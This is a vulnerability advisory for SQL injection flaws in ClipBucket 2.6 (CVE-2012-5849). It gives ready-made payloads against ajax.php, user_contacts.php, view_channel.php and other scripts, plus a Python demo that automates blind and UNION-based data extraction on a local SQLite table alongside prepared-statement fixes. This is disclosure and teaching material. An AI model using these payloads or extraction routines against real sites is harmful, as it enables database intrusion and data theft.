ClipBucket is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Vulnerable Systems:
* ClipBucket 2.6 Revision 738 and probably prior
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in ClipBucket, which can be exploited to
perform SQL Injection attacks.
1) Multiple SQL Injections in ClipBucket: CVE-2012-5849
1.1 The vulnerability exists due to insufficient sanitization of input in multiple parameters within the "/ajax.php" script.
A remote attacker can send a specially crafted HTTP POST request and execute arbitrary SQL queries in the application's
database. The following parameters are vulnerable to SQL injection:
- "uid" (when "mode" is set to "add_friend"). This vulnerability requires that the attacker is logged in to the
application; however, new user registration is open by default;
- "id" (when "mode" is set to "share_object" or "add_to_fav", and "type" is set to "video", "photo", or "collection");
- "id" (when "mode" is set to "rating" and "type" is set to "video", "photo", "collection", or "user"). This
vulnerability requires that the attacker is logged in to the application; however, new user registration is open by
default;
- "id" (when "mode" is set to "flag_object" and "type" is set to "video", "group", "user", "photo", or "collection");
- "cid" (when "mode" is set to "add_new_item" or "remove_collection_item" and "type" is set to "video" or "photo");
- "cid" (when "mode" is set to "remove_collection_item" and "type" is set to "videos" or "photos");
- "cid" (when "mode" is set to "get_item" or "load_more_items" and "type" is set to "videos" or "photos");
- "ci_id" (when "mode" is set to "get_item" and "type" is set to "videos" or "photos").
The following PoC (Proof-of-Concept) codes demonstrate the vulnerabilities.
The second PoC uses the error-based SQL injection technique to display the SQL server version:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="rating" />
<input type="hidden" name="type" value="[video|photo|collection|user]" />
<input type="hidden" name="rating" value="1" />
<!-- The shifting @a value makes the GROUP BY key collide, so MySQL raises a "Duplicate entry" error that echoes @@version; the trailing space after "--" is required for the MySQL comment -->
<input type="hidden" name="id" value="-1 OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="submit" id="btn">
</form>
The third PoC demonstrates exploitation by the boolean-based blind SQL injection technique:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="share_object" />
<input type="hidden" name="type" value="video" />
<!-- id 0 matches no object, so whether the lookup succeeds depends only on the injected comparison -->
<input type="hidden" name="id" value="0 OR version()>='5' -- " />
<input type="submit" id="btn">
</form>
If the application runs MySQL server version 5 or greater, the injected condition is true and the response to the above
HTTP request is one of the messages "You are not logged in" or "Please enter usernames or emails to send this video"; a
different response when the condition is false is what gives the attacker the true/false oracle a blind attack needs.
1.2 The vulnerability was discovered in the "/user_contacts.php" script while handling the "user" HTTP GET parameter. A
remote attacker can inject and execute arbitrary SQL commands in the application's database.
The following PoC demonstrates the vulnerability (URL-encoded: %27 is the single quote that closes the string literal,
%28%29 are the parentheses of version(), and the UNION is padded to the column count of the original query):
http://[host]/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202
1.3 The vulnerability was discovered in the "/view_channel.php" script while handling the "user" HTTP GET parameter. A
remote attacker can inject and execute arbitrary SQL commands in the application's database.
The following PoC demonstrates the vulnerability:
http://[host]/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202
1.4 The vulnerability exists due to an error in the "view_page.php" script while handling the "pid" HTTP GET parameter.
A remote attacker can inject and execute arbitrary SQL commands in the application's database.
The following PoC demonstrates the vulnerability:
http://[host]/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202
1.5 The vulnerability was discovered in the "view_topic.php" script while handling the "tid" HTTP GET parameter. A
remote attacker can inject and execute arbitrary SQL commands in the application's database.
The following PoC demonstrates the vulnerability:
http://[host]/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202
1.6 The vulnerability was discovered in the "/watch_video.php" script while handling the "v" HTTP GET parameter. A
remote attacker can inject and execute arbitrary SQL commands in the application's database.
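As an added illustration (not code from this advisory or from ClipBucket), the following Python script rebuilds both injection shapes above against an in-memory SQLite table with constructed sample rows: the numeric-context ajax.php "id" injection (1.1) driven as a boolean-blind oracle that reads out the whole server version rather than only testing >= '5', and the string-context "user"/"pid"/"tid" injections (1.2 to 1.6) driven as a UNION read, including the column-count probing that yields the 10-, 12- and 50-column PoCs. The table layout, the function names and sqlite_version() (standing in for MySQL's version() and @@version) are assumptions for the demo. Each vulnerable lookup is paired with its bound-parameter form, which is the fix ClipBucket needs (mysqli or PDO prepared statements in PHP).

```python
"""Added illustration, not ClipBucket code: a hypothetical data-access layer over an
in-memory SQLite table (constructed sample data) showing why the advisory's two payload
shapes work and how bound parameters stop them. sqlite_version() stands in for MySQL's
version()/@@version."""
import sqlite3

# Constructed sample rows standing in for the real ClipBucket users table.
SAMPLE_USERS = [
    (1, "alice", "alice@example.invalid", "Alice's channel"),
    (2, "bob", "bob@example.invalid", "Bob's channel"),
]
COLUMNS = "userid, username, email, channel"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER, username TEXT, email TEXT, channel TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def db_version(conn):
    """Ground truth: what the server reports when asked directly."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


# --- Vulnerable pattern: request parameters pasted into the SQL text -----------------

def object_exists_vulnerable(conn, obj_id):
    """Numeric context, like ajax.php's share_object/add_to_fav 'id': the value is
    concatenated unquoted, so an appended 'OR <condition>' rewrites the WHERE clause."""
    sql = "SELECT COUNT(*) FROM users WHERE userid = " + obj_id
    return conn.execute(sql).fetchone()[0] > 0


def channel_vulnerable(conn, user):
    """String context, like the 'user' parameter of user_contacts.php/view_channel.php:
    a leading quote closes the literal, so a UNION SELECT can append attacker rows."""
    sql = "SELECT " + COLUMNS + " FROM users WHERE username = '" + user + "'"
    return conn.execute(sql).fetchall()


# --- Boolean-blind extraction through the numeric-context injection -----------------

def oracle(conn, condition):
    """The app only reveals whether the lookup found a row (the advisory's 'Please enter
    usernames or emails...' message vs. another). id 0 matches nothing, so the outcome
    depends on the injected condition alone: a yes/no oracle."""
    return object_exists_vulnerable(conn, "0 OR (" + condition + ") -- ")


def extract_blind(conn, expression, charset="0123456789."):
    """Generalises the advisory's version()>='5' probe into a full read of any SQL
    expression, one character per round of oracle queries."""
    value = ""
    while True:
        for ch in charset:
            probe = "substr(%s, %d, 1) = '%s'" % (expression, len(value) + 1, ch)
            if oracle(conn, probe):
                value += ch
                break
        else:
            return value  # no candidate matched: end of string


# --- UNION-based extraction through the string-context injection --------------------

def find_column_count(conn, limit=64):
    """The GET PoCs pad the UNION with 10, 12 or 50 dummy columns; this is how that
    width is found: widen the SELECT until the column-count mismatch error goes away."""
    for n in range(1, limit + 1):
        payload = "0' UNION SELECT " + ",".join(str(i) for i in range(1, n + 1)) + " -- "
        try:
            channel_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:  # "...do not have the same number of result columns"
            continue
    return None


def union_payload(expression, columns, position):
    """Close the quote, UNION a SELECT of the right width with the expression in the
    column the page echoes back, and comment out the original trailing quote."""
    cells = [str(i) for i in range(1, columns + 1)]
    cells[position - 1] = expression
    return "0' UNION SELECT " + ",".join(cells) + " -- "


def union_extract(conn, expression):
    columns = find_column_count(conn)
    rows = channel_vulnerable(conn, union_payload(expression, columns, columns))
    return rows[0][columns - 1]


# --- Hardened form: type enforcement plus bound parameters --------------------------

def object_exists_safe(conn, obj_id):
    """Reject anything that is not an integer before SQL sees it, then bind it."""
    try:
        n = int(obj_id)
    except (TypeError, ValueError):
        return False
    return conn.execute("SELECT COUNT(*) FROM users WHERE userid = ?", (n,)).fetchone()[0] > 0


def channel_safe(conn, user):
    """A bound parameter is data, never SQL, whatever characters it contains."""
    return conn.execute("SELECT " + COLUMNS + " FROM users WHERE username = ?", (user,)).fetchall()
```

Calling extract_blind(db, "sqlite_version()") and union_extract(db, "sqlite_version()") on make_db() both return the same string as db_version(db), while channel_safe(db, union_payload("sqlite_version()", 4, 4)) returns no rows and object_exists_safe(db, "0 OR 1=1 -- ") returns False: the payloads only work because the value reaches the SQL parser as code.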